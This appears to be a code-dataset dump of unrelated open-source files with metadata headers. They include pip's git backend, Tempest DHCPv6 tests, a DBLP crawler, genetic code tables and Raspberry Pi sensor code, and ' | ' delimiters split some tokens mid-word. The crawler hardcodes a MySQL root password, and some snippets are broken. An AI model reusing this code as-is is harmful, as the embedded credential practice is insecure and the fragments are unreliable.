map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('PrivateLinkResourceListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_by_vault.metadat | a = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/vaults/{vaultName}/privateLinkResou | rces'} # type: ignore
|
mathjazz/pontoon | pontoon/checks/models.py | Python | bsd-3-clause | 1,177 | 0.00085 | from django.db import models
from pontoon.base.models import Translation
class FailedCheck(models.Model):
"""
Store checks performed on translations if they failed.
Severity of failed checks are expressed by subclasses of this model.
"""
class Library(models.TextChoices):
PONTOON = "p", "pontoon"
COMPARE_LOCALES = "cl", "c | ompare-locales"
library = models.CharField(
max_length=20,
choices=Library.choices,
db_index=True,
)
message = models.TextField()
class Meta:
abstract = True
def __repr__(self):
return "[{}] {}: {}".format(
self.__class__.__name__, self.get_library_display(), self.message
)
class Warning(FailedCheck):
translation = models.ForeignKey(
Tra | nslation, models.CASCADE, related_name="warnings"
)
class Meta(FailedCheck.Meta):
unique_together = (("translation", "library", "message"),)
class Error(FailedCheck):
translation = models.ForeignKey(Translation, models.CASCADE, related_name="errors")
class Meta(FailedCheck.Meta):
unique_together = (("translation", "library", "message"),)
|
pantsbuild/pex | pex/vendor/_vendored/pip/pip/_internal/vcs/git.py | Python | apache-2.0 | 15,599 | 0 | # The following comment should be removed at some point in the future.
# mypy: disallow-untyped-defs=False
from __future__ import absolute_import
import logging
import os.path
import re
from pip._vendor.packaging.version import parse as parse_version
from pip._vendor.six.moves.urllib import parse as urllib_parse
from pip._vendor.six.moves.urllib import request as urllib_request
from pip._internal.exceptions import BadCommand, InstallationError
from pip._internal.utils.misc import display_path, hide_url
from pip._internal.utils.subprocess import make_command
from pip._internal.utils.temp_dir import TempDirectory
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
from pip._internal.vcs.versioncontrol import (
RemoteNotFoundError,
VersionControl,
find_path_to_setup_from_repo_root,
vcs,
)
if MYPY_CHECK_RUNNING:
from typing import Optional, Tuple
from pip._internal.utils.misc import HiddenText
from pip._internal.vcs.versioncontrol import AuthInfo, RevOptions
urlsplit = urllib_parse.urlsplit
urlunsplit = urllib_parse.urlunsplit
logger = logging.getLogger(__name__)
HASH_REGEX = re.compile('^[a-fA-F0-9]{40}$')
def looks_like_hash(sha):
return bool(HASH_REGEX.match(sha))
class Git(VersionControl):
name = 'git'
dirname = '.git'
repo_name = 'clone'
schemes = (
'git', 'git+http', 'git+https', 'git+ssh', 'git+git', 'git+file',
)
# Prevent the user's environment variables from interfering with pip:
# https://github.com/pypa/pip/issues/1130
unset_environ = ('GIT_DIR', 'GIT_WORK_TREE')
default_arg_rev = 'HEAD'
@staticmethod
def get_base_rev_args(rev):
return [rev]
def is_immutable_rev_checkout(self, url, dest):
# type: (str, str) -> bool
_, rev_options = self.get_url_rev_options(hide_url(url))
if not rev_options.rev:
return False
if not self.is_commit_id_equal(dest, rev_options.rev):
# the current commit is different from rev,
# which means rev was something else than a commit hash
return False
# return False in the rare case rev is both a commit hash
# and a tag or a branch; we don't want to cache in that case
# because that branch/tag could point to something else in the future
is_tag_or_branch = bool(
self.get_revision_sha(dest, rev_options.rev)[0]
)
return not is_tag_or_branch
def get_git_version(self):
VERSION_PFX = 'git version '
version = self.run_command(
['version'], show_stdout=False, stdout_only=True
)
if version.startswith(VERSION_PFX):
version = version[len(VERSION_PFX):].split()[0]
else:
version = ''
# get first 3 positions of the git version because
# on windows it is x.y.z.windows.t, and this parses as
# LegacyVersion which always smaller than a Version.
version = '.'.join(version.split('.')[:3])
return parse_version(version)
@classmethod
def get_current_branch(cls, location):
"""
Return the current branch, or None if HEAD isn't at a branch
(e.g. detached HEAD).
"""
# git-symbolic-ref exits with empty stdout if "HEAD" is a detached
# HEAD rather than a symbolic ref. In addition, the -q causes the
# command to exit with status code 1 instead of 128 in this case
# and to suppress the message to stderr.
args = ['symbolic-ref', '-q', 'HEAD']
output = cls.run_command(
args,
extra_ok_returncodes=(1, ),
show_stdout=False,
stdout_only=True,
cwd=location,
)
ref = output.strip()
if ref.startswith('refs/heads/'):
return ref[len('refs/heads/'):]
return None
def export(self, location, url):
# type: (str, HiddenText) -> None
"""Export the Git repository at the url to the destination location"""
if not location.endswith('/'):
location = location + '/'
with TempDirectory(kind="export") as temp_dir:
self.unpack(temp_dir.path, url=url)
self.run_command(
['checkout-index', '-a', '-f', '--prefix', location],
show_stdout=False, cwd=temp_dir.path
)
@classmethod
def get_revision_sha(cls, dest, rev):
"""
Return (sha_or_none, is_branch), where sha_or_none is a commit hash
if the revision names a remote branch or tag, otherwise None.
Args:
dest: the repository directory.
rev: the revision name.
"""
# Pass rev to pre-filter the list.
output = cls.run_command(
['show-ref', rev],
cwd=dest,
show_stdout=False,
stdout_only=True,
on_returncode='ignore',
)
refs = {}
for line in output.strip().splitlines():
try:
sha, ref = line.split()
except ValueError:
# Include the offending line to simplify troubleshooting if
# this error ever occurs.
raise ValueError('unexpected show-ref line: {!r}'.format(line))
refs[ref] = sha
branch_ref = 'refs/remotes/origin/{}'.format(rev)
tag_ref = 'refs/tags/{}'.format(rev)
sha = refs.get(branch_ref)
if sha is not None:
return (sha, True)
sha = refs.get(tag_ref)
return (sha, False)
@classmethod
def _should_fetch(cls, dest, rev):
"""
Return true if rev is a ref or is a commit that we don't have locally.
Branches and tags are not considered in this method because they are
assumed to be always available locally (which is a normal outcome of
``git clone` | ` and ``git fetch --tags``).
"""
if rev.startswith("refs/"):
# Always fetch remote refs.
return True
if not looks_like_hash(rev):
# Git fetch would fail wi | th abbreviated commits.
return False
if cls.has_commit(dest, rev):
# Don't fetch if we have the commit locally.
return False
return True
@classmethod
def resolve_revision(cls, dest, url, rev_options):
# type: (str, HiddenText, RevOptions) -> RevOptions
"""
Resolve a revision to a new RevOptions object with the SHA1 of the
branch, tag, or ref if found.
Args:
rev_options: a RevOptions object.
"""
rev = rev_options.arg_rev
# The arg_rev property's implementation for Git ensures that the
# rev return value is always non-None.
assert rev is not None
sha, is_branch = cls.get_revision_sha(dest, rev)
if sha is not None:
rev_options = rev_options.make_new(sha)
rev_options.branch_name = rev if is_branch else None
return rev_options
# Do not show a warning for the common case of something that has
# the form of a Git commit hash.
if not looks_like_hash(rev):
logger.warning(
"Did not find branch or tag '%s', assuming revision or ref.",
rev,
)
if not cls._should_fetch(dest, rev):
return rev_options
# fetch the requested revision
cls.run_command(
make_command('fetch', '-q', url, rev_options.to_args()),
cwd=dest,
)
# Change the revision to the SHA of the ref we fetched
sha = cls.get_revision(dest, rev='FETCH_HEAD')
rev_options = rev_options.make_new(sha)
return rev_options
@classmethod
def is_commit_id_equal(cls, dest, name):
"""
Return whether the current commit hash equals the given name.
Args:
dest: the repository directory.
name: a string name.
"""
if not name:
# Then avoid an unnecessary subprocess call.
return False
return cls.get_revis |
dcclogin/TextGenerator | TitleCrawler/ccf_conference/categories/database/apweb2015.py | Python | mit | 3,395 | 0.028866 |
# -*- coding: utf-8 -*-
import re
import copy
import random
import os, sys
import MySQLdb
import requests
from time import sleep
from threading import Thread
from bs4 import BeautifulSoup
reload(sys)
sys.setdefaultencoding('utf-8')
clade = 'http://dblp.uni-trier.de/db/conf/apweb/'
months = {
'January': '01',
'February': '02',
'March': '03',
'April': '04',
'May': '05',
'June': '06',
'July': '07',
'August': '08',
'September': '09',
'October': '10',
'November': '11',
'December': '12'
}
# regex to match months in <h2> tags
re_mons=r'(January|February|March|April|May|June|July|August|September|October|November|December)'
repeato_mons=r'([ /-]*'+re_mons+r'*)*'
pattern_mons=re_mons+repeato_mons
# regex to match years in <h2> tags
re_year=r'((19|20)\d+)'
repeato_year=r'([ /-]*'+re_year+r'*)*'
pattern_year=re_year+repeato_year
def get_leaves(clade):
r = requests.get(clade)
if r.status_code | == 200:
soup = BeautifulSoup(r.text, 'lxml')
leaves = []
late = soup.find('ul', class_='publ-list')
tags = late.find_all('div', class_='data', itemprop='headline')
for tag in tags:
leaves.append(tag.find_all('a')[-1]['href'])
return leaves
def sub_months(match_obj):
""" transfer months to digital form (in-place change)
"""
for m in months:
match_obj = re.sub(m, months[m], match_obj)
return match_obj
def get_yymm(leaf):
r = requests.get( | leaf)
if r.status_code == 200:
soup = BeautifulSoup(r.text, 'lxml')
lat = soup.find('div', class_='data', itemprop='headline')
tag = lat.find('span', class_='title', itemprop='name')
txt = tag.get_text()
try:
match_obj_mons = re.search(pattern_mons, txt)
match_obj_mons = match_obj_mons.group().strip()
match_obj_mons = sub_months(match_obj_mons)
month = match_obj_mons
except Exception, error_mons:
print '[-]', error_mons
month = None
try:
match_obj_year = re.search(pattern_year, txt)
match_obj_year = match_obj_year.group().strip()
year = match_obj_year
except Exception, error_year:
print '[-]', error_year
year = None
return year, month
def get_titles(leaf):
r = requests.get(leaf)
if r.status_code == 200:
soup = BeautifulSoup(r.text, 'lxml')
title_lst = []
tags = soup.find_all('span', class_='title', itemprop='name')
for tag in tags:
title_lst.append(tag.get_text())
return title_lst
def incert_mysql(year, month, title_lst):
try:
tablename = 'papertitle'
conn = MySQLdb.connect(host='127.0.0.1', user='root', passwd='13917331612', db='conference')
c = conn.cursor()
conn.set_character_set('utf8')
c.execute('SET NAMES utf8;')
c.execute('SET CHARACTER SET utf8;')
c.execute('SET character_set_connection=utf8;')
for p in title_lst:
try:
sql = "insert into " + tablename + "(year, month, name, title, class, category) \
values(%s, %s, %s, %s, %s, %s)"
param = (year, month, 'APWeb', p, 'C', 'database')
c.execute(sql, param)
print ">>>> [+] Insert paper <%s> : done." %(p)
except MySQLdb.Error, e:
print "[-] Mysql Error %d: %s" % (e.args[0], e.args[1])
continue
conn.commit()
c.close()
except MySQLdb.Error, e:
print "[-] Mysql Error %d: %s" % (e.args[0], e.args[1])
return None
def build():
leaves = get_leaves(clade)
for leaf in leaves:
title_lst = get_titles(leaf)
year, month = get_yymm(leaf)
incert_mysql(year, month, title_lst)
return None
build() |
lcharleux/argiope | argiope/tests/mesh/triangulation.py | Python | gpl-3.0 | 1,193 | 0.004191 | import argiope as ag
import numpy as np
import pandas as pd
from matplotlib.tri import Triangulation
mesh = ag.mesh.read_msh("demo.msh")
conn = mesh.split("simplices").unstack()
coords = mesh.nodes.coords.copy()
node_map = pd.Series(data = np.arange(len(coords)), index = coords.index)
conn = node_map.loc[conn.values.flatten()].values.reshape(*conn.shape)
triangulation = Triangulation(coords.x.values, coords.y.values, conn)
"""
nodes, elements = mesh.nodes, mesh.elements
#NODES
nodes_map = np.arange(nodes.index.max()+1)
nodes_map[nodes.index] = np.arange(len(nodes.index))
nodes_map[0] = -1
coords = nodes.coords.as_matrix()
#ELEMENTS
connectivities = elements.conn.as_matrix()
connectivities[np.isnan(connectivities)] = 0
connectivities = connectiv | ities.astype(np.int32)
connectivities = nodes_map[connectivities]
labels = np.array(elements.index)
etype = np.array(elements.type.argiope).flatten()
print(etype)
#TRIANGLES
x, y, tri = [], [], []
for i in range(len(etype)):
triangles = connectivities[i][argiope.mesh.ELEMENTS[etype[i]]["simplices"]]
for t in triangles:
tri.append(t)
triangulation = mpl.tri.Triangulation(coor | ds[:,0], coords[:,1], tri)
"""
|
h3l/rfw_utils | setup.py | Python | mit | 1,054 | 0.015217 | from setuptools import setup, find_packages
import sys, os
"""
| 打包的用的setup必须引入
"""
VERSION = '0.0.1'
with open('README.md') as f:
long_description = f.read()
setup(
name='rfw_utils', # 文件名
version=VERSION, # 版本(每次更新上传Pypi需要修改)
description="Speed up restframework develop",
long_description=long_description, # 放READM | E.md文件,方便在Pypi页展示
classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers
keywords='restframework utils', # 关键字
author='helvetica', # 用户名
author_email='xidianlz@gmail.com', # 邮箱
url='https://github.com/h3l/rfw_utils', # github上的地址,别的地址也可以
license='MIT', # 遵循的协议
packages=['rfw_utils', "rfw_utils.management", "rfw_utils.management.commands"], # 发布的包名
include_package_data=True,
zip_safe=True,
install_requires=[
'django',
'djangorestframework'
], # 满足的依赖
)
|
pgfoster/p4-phylogenetics | p4/geneticcode.py | Python | gpl-2.0 | 18,804 | 0.004733 | import string
import sys
class GeneticCode:
"""A container for NCBI translation tables.
See the ncbi translation tables, which this week are at
http://www.ncbi.nlm.nih.gov/Taxonomy/Utils/wprintgc.cgi?mode=c
(If they move, poke around the 'taxonomy browser' area.)
This week we have
- **1** standard
- **2** vertebrate mito
- **3** yeast mito
- **4** Mold, Protozoan
- **5** invertbrate mito
- **6** The Ciliate, Dasycladacean and Hexamita Nuclear Code
- **9** echinoderm and flatworm mito
- **10** Euplotid Nuclear Code
- **11** Bacterial and Plant Plastid Code
- **12** Alternative Yeast Nuclear Code
- **13** Ascidian Mitochondrial Code
- **14** Alternative Flatworm Mitochondrial Code
- **21** Trematode Mitochondrial Code
- **24** Pterobranchia mito
If more transl_tables are needed, you should be able to just drop
them in, with a little tweaking.
This provides
- **code** A dictionary. So you can ask for eg myGC.code['ggg']
- **codonsForAA** Another dictionary, where you can ask for eg myGC.codonsForAA['v']
- **startList** A list of start codons
**Methods**
.. autosummary::
GeneticCode.translate
GeneticCode.wise2Table
Wikipedia says: The joint nomenclature committee of the
IUPAC/IUBMB has officially recommended the three-letter symbol Sec
and the one-letter symbol U for selenocysteine. The UGA codon is
made to encode selenocysteine by the presence of a SECIS element
(SElenoCysteine Insertion Sequence) in the mRNA.
"""
def __init__(self, transl_table=1):
self.transl_table = transl_table
self.code = {}
self.codonsForAA = {}
self.startList = []
if transl_table == 1: # standard
AAs = 'FFLLSSSSYY**CC*WLLLLPPPPHHQQRRRRIIIMTTTTNNKKSSRRVVVVAAAADDEEGGGG'
Starts = '---M---------------M---------------M----------------------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
elif transl_table == 2: # vertebrate mito
AAs = 'FFLLSSSSYY**CCWWLLLLPPPPHHQQRRRRIIMMTTTTNNKKSS**VVVVAAAADDEEGGGG'
Starts = '--------------------------------MMMM---------------M------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
# 3. The Yeast Mitochondrial Code (transl_table=3)
elif transl_table == 3:
AAs = 'FFLLSSSSYY**CCWWTTTTPPPPHHQQRRRRIIMMTTTTNNKKSSRRVVVVAAAADDEEGGGG'
Starts = '----------------------------------MM----------------------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
elif transl_table == 4: # Mold, Protozoan,
# and Coelenterate Mitochondrial Code and the
# Mycoplasma/Spiroplasma Code
AAs = 'FFLLSSSSYY**CCWWLLLLPPPPHHQQRRRRIIIMTTTTNNKKSSRRVVVVAAAADDEEGGGG'
Starts = '--MM---------------M------------MMMM---------------M------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
elif transl_table == 5: # invertebrate mito
AAs = 'FFLLSSSSYY**CCWWLLLLPPPPHHQQRRRRIIMMTTTTNNKKSSSSVVVVAAAADDEEGGGG'
Starts = '---M----------------------------MMMM---------------M------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
# The Ciliate, Dasycladacean and Hexamita Nuclear Code (transl_table=6)
elif transl_table == 6:
AAs = 'FFLLSSSSYYQQ | CC*WLLLLPPPPHHQQRRRRIIIMTTTTNNKKSSRRVVVVAAAADDEEGGGG'
Starts = '-----------------------------------M----------------------------'
| Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
# tables 7 and 8 have been deleted from NCBI.
elif transl_table == 9: # echinoderm and flatworm mito
AAs = 'FFLLSSSSYY**CCWWLLLLPPPPHHQQRRRRIIIMTTTTNNNKSSSSVVVVAAAADDEEGGGG'
Starts = '-----------------------------------M----------------------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
elif transl_table == 10: # The Euplotid Nuclear Code (transl_table=10)
AAs = 'FFLLSSSSYY**CCCWLLLLPPPPHHQQRRRRIIIMTTTTNNKKSSRRVVVVAAAADDEEGGGG'
Starts = '-----------------------------------M----------------------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
# The Bacterial and Plant Plastid Code (transl_table=11)
elif transl_table == 11:
AAs = 'FFLLSSSSYY**CC*WLLLLPPPPHHQQRRRRIIIMTTTTNNKKSSRRVVVVAAAADDEEGGGG'
Starts = '---M---------------M------------MMMM---------------M------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
# The Alternative Yeast Nuclear Code (transl_table=12)
elif transl_table == 12:
AAs = 'FFLLSSSSYY**CC*WLLLSPPPPHHQQRRRRIIIMTTTTNNKKSSRRVVVVAAAADDEEGGGG'
Starts = '-------------------M---------------M----------------------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
# The Ascidian Mitochondrial Code (transl_table=13)
elif transl_table == 13:
AAs = 'FFLLSSSSYY**CCWWLLLLPPPPHHQQRRRRIIMMTTTTNNKKSSGGVVVVAAAADDEEGGGG'
Starts = '---M------------------------------MM---------------M------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
# The Alternative Flatworm Mitochondrial Code (transl_table=14)
elif transl_table == 14:
AAs = 'FFLLSSSSYYY*CCWWLLLLPPPPHHQQRRRRIIIMTTTTNNNKSSSSVVVVAAAADDEEGGGG'
Starts = '-----------------------------------M----------------------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
# Trematode Mitochondrial Code (transl_table=2 |
nuagenetworks/tempest | tempest/api/network/test_dhcp_ipv6.py | Python | apache-2.0 | 18,551 | 0.000054 | # Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
import random
import six
from tempest.api.network import base
from tempest.common.utils import data_utils
from tempest import config
from tempest.lib import exceptions as lib_exc
from tempest import test
CONF = config.CONF
class NetworksTestDHCPv6(base.BaseNetworkTest):
_ip_version = 6
""" Test DHCPv6 specific features using SLAAC, stateless and
stateful settings for subnets. Also it shall check dual-stack
functionality (IPv4 + IPv6 together).
The tests include:
generating of SLAAC EUI-64 address in subnets with various settings
receiving SLAAC addresses in combinations of various subnets
receiving stateful IPv6 addresses
addressing in subnets with router
"""
@classmethod
def skip_checks(cls):
super(NetworksTestDHCPv6, cls).skip_checks()
msg = None
if not CONF.network_feature_enabled.ipv6:
msg = "IPv6 is not enabled"
elif not CONF.network_feature_enabled.ipv6_subnet_attributes:
msg = "DHCPv6 attributes are not enabled."
if msg:
raise cls.skipException(msg)
@classmethod
def resource_setup(cls):
super(NetworksTestDHCPv6, cls).resource_setup()
cls.network = cls.create_network()
def _remove_from_list_by_index(self, things_list, elem):
for index, i in enumerate(things_list):
if i['id'] == elem['id']:
break
del things_list[index]
def _clean_network(self):
body = self.ports_client.list_ports()
ports = body['ports']
for port in ports:
if (port['device_owner'].startswith('network:router_interface') and
port['device_id'] in [r['id'] for r in self.routers]):
self.routers_client.remove_router_interface(port['device_id'],
port_id=port['id'])
else:
if port['id'] in [p['id'] for p in self.ports]:
self.ports_client.delete_port(port['id'])
self._remove_from_list_by_index(self.ports, port)
body = self.subnets_client.list_subnets()
subnets = body['subnets']
for subnet in subnets:
if subnet['id'] in [s['id'] for s in self.subnets]:
self.subnets_client.delete_subnet(subnet['id'])
self._remove_from_list_by_index(self.subnets, subnet)
body = self.routers_client.list_routers()
routers = body['routers']
for router in routers:
if router['id'] in [r['id'] for r in self.routers]:
self.routers_client.delete_router(router['id'])
self._remove_from_list_by_index(self.routers, router)
def _get_ips_from_subnet(self, **kwargs):
subnet = self.create_subnet(self.network, **kwargs)
port_mac = data_utils.rand_mac_address()
port = self.create_port(self.network, mac_address=port_mac)
real_ip = next(iter(port['fixed_ips']), None)['ip_address']
eui_ip = data_utils.get_ipv6_addr_by_EUI64(subnet['cidr'],
port_mac).format()
return real_ip, eui_ip
@test.idempotent_id('e5517e62-6f16-430d-a672-f80875493d4c')
def test_dhcpv6_stateless_eui64(self):
# NOTE: When subnets configured with RAs SLAAC (AOM=100) and DHCP
# stateless (AOM=110) both for radvd and dnsmasq, port shall receive
# IP address calculated from its MAC.
for ra_mode, add_mode in (
('slaac', 'slaac'),
('dhcpv6-stateless', 'dhcpv6-stateless'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
real_ip, eui_ip = self._get_ips_from_subnet(**kwargs)
self._clean_network()
self.assertEqual(eui_ip, real_ip,
('Real port IP is %s, but shall be %s when '
'ipv6_ra_mode=%s and ipv6_address_mode=%s') % (
real_ip, eui_ip, ra_mode, add_mode))
@test.idempotent_id('ae2f4a5d-03ff-4c42-a3b0-ce2fcb7ea832')
def test_dhcpv6_stateless_no_ra(self):
# NOTE: When subnets configured with dnsmasq SLAAC and DHCP stateless
# and there is no radvd, port shall receive IP address calculated
# from its MAC and mask of subnet.
for ra_mode, add_mode in (
(None, 'slaac'),
(None, 'dhcpv6-stateless'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
kwargs = dict((k, v) for k, v in six.iteritems(kwargs) if v)
real_ip, eui_ip = self._get_ips_from_subnet(**kwargs)
self._clean_network()
self.assertEqual(eui_ip, real_ip,
('Real port IP %s shall be equal to EUI-64 %s'
'when ipv6_ra_mode=%s,ipv6_address_mode=%s') % (
real_ip, eui_ip,
ra_mode if ra_mode else "Off",
add_mode if add_mode else "Off"))
@test.idempotent_id('81f18ef6-95b5-4584-9966-10d480b7496a')
def test_dhcpv6_invalid_options(self):
"""Different configurations for radvd and dnsmasq are not allowed"""
for ra_mode, add_mode in (
('dhcpv6-stateless', 'dhcpv6-s | tateful'),
('dhcpv6-stateless', 'slaac'),
('slaac', 'dhcpv6-stateful'),
('dhcpv6-stateful', 'dhcpv6-stateless'),
('dhcpv6-stateful', 'slaac'),
('slaac', 'dhcpv6-stateless'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
sel | f.assertRaises(lib_exc.BadRequest,
self.create_subnet,
self.network,
**kwargs)
@test.idempotent_id('21635b6f-165a-4d42-bf49-7d195e47342f')
def test_dhcpv6_stateless_no_ra_no_dhcp(self):
# NOTE: If no radvd option and no dnsmasq option is configured
# port shall receive IP from fixed IPs list of subnet.
real_ip, eui_ip = self._get_ips_from_subnet()
self._clean_network()
self.assertNotEqual(eui_ip, real_ip,
('Real port IP %s equal to EUI-64 %s when '
'ipv6_ra_mode=Off and ipv6_address_mode=Off,'
'but shall be taken from fixed IPs') % (
real_ip, eui_ip))
@test.idempotent_id('4544adf7-bb5f-4bdc-b769-b3e77026cef2')
def test_dhcpv6_two_subnets(self):
# NOTE: When one IPv6 subnet configured with dnsmasq SLAAC or DHCP
# stateless and other IPv6 is with DHCP stateful, port shall receive
# EUI-64 IP addresses from first subnet and DHCP address from second
# one. Order of subnet creating should be unimportant.
for order in ("slaac_first", "dhcp_first"):
for ra_mode, add_mode in (
('slaac', 'slaac'),
('dhcpv6-stateless', 'dhcpv6-stateless'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
kwargs_dhcp = {'ipv6_address_mode': 'dhcpv6-stateful'}
if order == "slaac_first":
subnet_slaac = self |
wodiesan/senior_design_spring | night_sensor/night_feature.py | Python | mit | 1,274 | 0.00157 | """
@author: Sze "Ron" Chau
@e-mail: chaus3@wit.edu
@source: https://github.com/wodiesan/sweet-skoomabot
@desc Night sensor-->RPi for Senior Design 1
"""
import logging
import os
import RPi.GPIO as GPIO
import serial
import subprocess
import sys
import time
import traceback
# GPIO pins. Uses the BCM numbering system based on | RPi B+ board.
IR1 = 26
IR2 = 19
IR3 = 13
IR4 = 6
def init_serial():
"""Initialize the serial connection to the light sensor."""
ser = serial.Serial()
#ser.port = "\\.\COM4" # Windows |
ser.port = "/dev/ttyUSB0" # Linux
ser.baudrate = 57600
try:
ser.open()
except Exception, e:
logger.info("Possible open serial port: " + str(e))
print 'Check the serial USB port.'
exit()
return ser
def init_leds():
"""Initial setup for light sensor and IR LEDs. Currently uses the BCM
numbering system based on RPi B+ board."""
GPIO.setmode(GPIO.BCM)
GPIO.setup(IR1, GPIO.OUT, initial=GPIO.HIGH)
GPIO.setup(IR2, GPIO.OUT, initial=GPIO.HIGH)
GPIO.setup(IR3, GPIO.OUT, initial=GPIO.HIGH)
GPIO.setup(IR4, GPIO.OUT, initial=GPIO.HIGH)
thread = threading.Thread(target=warnings)
thread.daemon = False
thread.start()
return thread
|
SEL-Columbia/commcare-hq | corehq/apps/accounting/tests/base_tests.py | Python | bsd-3-clause | 191 | 0 | fr | om django.test import TestCase
from corehq.apps.accounting import generator
class BaseAccountingTest(TestCase):
def setUp(self):
generator.instantiate_accounting_for_tests() | |
yorkhackspace/pollution_graph | test_server.py | Python | gpl-3.0 | 3,182 | 0.002828 | #!/usr/bin/env python3
"""
Python half of the pollution monitor.
This bit is the brains, such that they are. The arduino
